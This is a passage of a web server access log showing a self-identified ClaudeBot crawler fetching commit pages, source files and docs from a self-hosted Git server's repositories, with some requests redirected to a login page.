[Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" [Client 216.73.216.188] [Length 10808] [Gzip 4.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=html%2Fstatus.json" [Client 216.73.216.188] [Length 17265] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 10128] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py" [Client 216.73.216.188] [Length 13033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js?display=source" [Client 216.73.216.188] [Length 27388] [Gzip 7.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md?display=source" [Client 216.73.216.188] [Length 11756] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 15793] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/index.html" [Client 216.73.216.188] [Length 21806] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 10171] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" [Client 216.73.216.188] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html?display=source" [Client 216.73.216.188] [Length 22702] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 2470] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json?display=source" [Client 216.73.216.188] [Length 11870] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" [Client 216.73.216.188] [Length 11045] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" [Client 216.73.216.188] [Length 12746] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" [Client 216.73.216.188] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/status.json" [Client 216.73.216.188] [Length 11075] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt" [Client 216.73.216.188] [Length 262] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FDebug%2Fnet8.0%2F.NETCoreApp%2CVersion%3Dv8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 21407] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fobj%2FOpcConnectionTest.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 23633] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/templates/index.html?display=source" [Client 216.73.216.188] [Length 16692] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" [Client 216.73.216.188] [Length 9872] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services" [Client 216.73.216.188] [Length 9917] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.gitignore?display=source" [Client 216.73.216.188] [Length 12228] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16465] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 11300] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14190] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/QUICKSTART.md?display=source" [Client 216.73.216.188] [Length 15199] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/main.py?display=source" [Client 216.73.216.188] [Length 24888] [Gzip 6.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" [Client 216.73.216.188] [Length 11261] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" [Client 216.73.216.188] [Length 13921] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2FProgram.cs" [Client 216.73.216.188] [Length 24169] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/app/calculator.py?display=source" [Client 216.73.216.188] [Length 13323] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13867] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcConnectionTest%2Fobj%2Fproject.assets.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fcommit%2F3181052619700dceeeef81a9a0851130498f177e%2FOpcConnectionTest%2Fobj%2FDebug" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 11621] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/package.json" [Client 216.73.216.188] [Length 11672] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py?display=source" [Client 216.73.216.188] [Length 13608] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Services.tsx" [Client 216.73.216.188] [Length 14650] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcConnectionTest%2Fobj%2Fproject.nuget.cache" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fobj%2Fproject.assets.json" [Client 216.73.216.188] [Length 20707] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 10015] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 10129] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py?display=source" [Client 216.73.216.188] [Length 12967] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fobj%2Fproject.nuget.cache" [Client 216.73.216.188] [Length 22667] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/requirements.txt?display=source" [Client 216.73.216.188] [Length 11435] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?files=html%2Fassets%2Fjs%2Fscript.js" [Client 216.73.216.188] [Length 18605] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" [Client 216.73.216.188] [Length 13003] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[15/Feb/2026:10:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 10542] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?files=asset_pilot_docker%2FupdateRecord.md" [Client 216.73.216.188] [Length 25689] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml" [Client 216.73.216.188] [Length 1854] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[15/Feb/2026:10:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" [Client 216.73.216.188] [Length 11665] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" [Client 216.73.216.188] [Length 10565] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html" [Client 216.73.216.188] [Length 14235] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcConnectionTest%2Fobj%2FDebug%2Fnet8.0" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 13407] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 14918] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 13583] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:52:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main..a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 216.73.216.188] [Length 9851] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 